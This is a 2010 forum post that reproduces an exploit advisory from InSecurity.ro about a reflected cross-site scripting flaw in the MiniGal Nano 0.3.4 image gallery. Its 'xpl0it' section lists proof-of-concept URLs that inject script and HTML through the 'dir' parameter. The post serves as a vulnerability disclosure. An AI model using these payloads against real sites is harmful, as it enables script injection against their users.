Zack Posted December 5, 2010 Report Posted December 5, 2010 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# ______ ____ __ [ xpl0it ] ##/\__ _\ /\ _`\ __/\ \__ ##\/_/\ \/ ___\ \,\L\_\ __ ___ __ __ _ __ /\_\ \ ,_\ __ __ ## \ \ \ /' _ `\/_\__ \ /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \ ## \_\ \__/\ \/\ \/\ \L\ \/\ __//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \ ## /\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\ \ \_\ \__\\/`____ \ ## \/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/ \/_/ \/_/\/__/ `/___/> \## _________________ /\___/## www.InSecurity.ro \/__/ #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-| 1.[Information] | Name : MiniGal Nano 0.3.4 XSS Vulnerablity| Author: Zack @ InSecurity.ro| Date: 05.12.2010| Mirror: http://www.minigal.dk/| Shoutz: Daemien, TiKode, Puscas_Marin, HrN, vichles, eXcEsuHk all ISR Staff!| 2.[Description] | Nano is a very simple and user friendly PHP/HTML/CSS image gallery script.| There is no backend, just upload it to your server along with your images and|you're good to go.Simple editing of the configuration file gives you control of|some features. | 3.[xpl0it]| Poc:| * http://server/?dir=[XSS]| | * http://server/?dir=<script>alert(/xss/)</script>| | * http://server/?dir=<marquee><h1>Zack @ InSecurity.ro</h1><marquee> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-| -[BECAUSE WE CARE, WE`RE SECURITY AWARE]- |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-http://codepad.org/k6jK1wvJ Quote
